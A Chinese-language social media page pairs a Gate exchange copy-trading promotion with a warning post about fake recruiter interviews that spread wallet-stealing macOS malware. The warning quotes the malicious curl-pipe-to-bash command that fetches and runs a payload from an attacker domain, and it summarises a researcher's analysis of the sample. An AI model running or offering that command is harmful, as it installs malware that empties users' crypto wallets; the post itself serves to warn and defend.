10,000 USDT 悬赏,寻找Gate广场跟单金牌星探!🕵️♀️
挖掘顶级带单员,赢取高额跟单体验金!
立即参与:https://www.gate.com/campaigns/4624
🎁 三大活动,奖金叠满:
1️⃣ 慧眼识英:发帖推荐带单员,分享跟单体验,抽 100 位送 30 USDT!
2️⃣ 强力应援:晒出你的跟单截图,为大神打 Call,抽 120 位送 50 USDT!
3️⃣ 社交达人:同步至 X/Twitter,凭流量赢取 100 USDT!
📍 标签: #跟单金牌星探 #GateCopyTrading
⏰ 限时: 4/22 16:00 - 5/10 16:00 (UTC+8)
详情:https://www.gate.com/announcements/article/50848
小心假招聘面試。它們現在已成為最乾淨的惡意軟件傳播途徑之一。
我兄弟這週差點中招。
步驟如下:
> 一個“招聘官”在LinkedIn上聯繫他
> 他們實際上已經閱讀了他的履歷。他們知道他的技術棧。他們預約了一個真正的面試時間。
> 通話前幾個小時:“你能在我們談之前快速瀏覽一下我們的產品頁面嗎?”
> 訪問該網站時,背景會執行以下命令:
curl -s macos[.]hyperhives[.]net/install | nohup bash &
如果你在提示時輸入密碼,就完了。
一位研究員(Darksp33d在Github)反向工程了這個二進制文件:
> 每個配置字符串都用570個獨特的自定義函數加密
> 解包後:完整的C2伺服器、完整的端點列表,以及一個與開發者在法律傳票下相關聯的sentry錯誤追蹤DSN
> 276個針對Chrome擴展ID,涵蓋188個加密貨幣錢包
> 與朝鮮“傳染性面試”的TTP重疊度很高
> 在VirusTotal上的得分為9/64。CrowdStrike、Sophos、Malwarebytes都未檢測出來
真正的招聘官、真正的履歷、真正的面試時間、看起來真的網站。一行curl就能掏空你的錢包。
如果“招聘官”讓你在終端中運行任何東西,即使是看似無害的構建腳本,也要關閉標籤。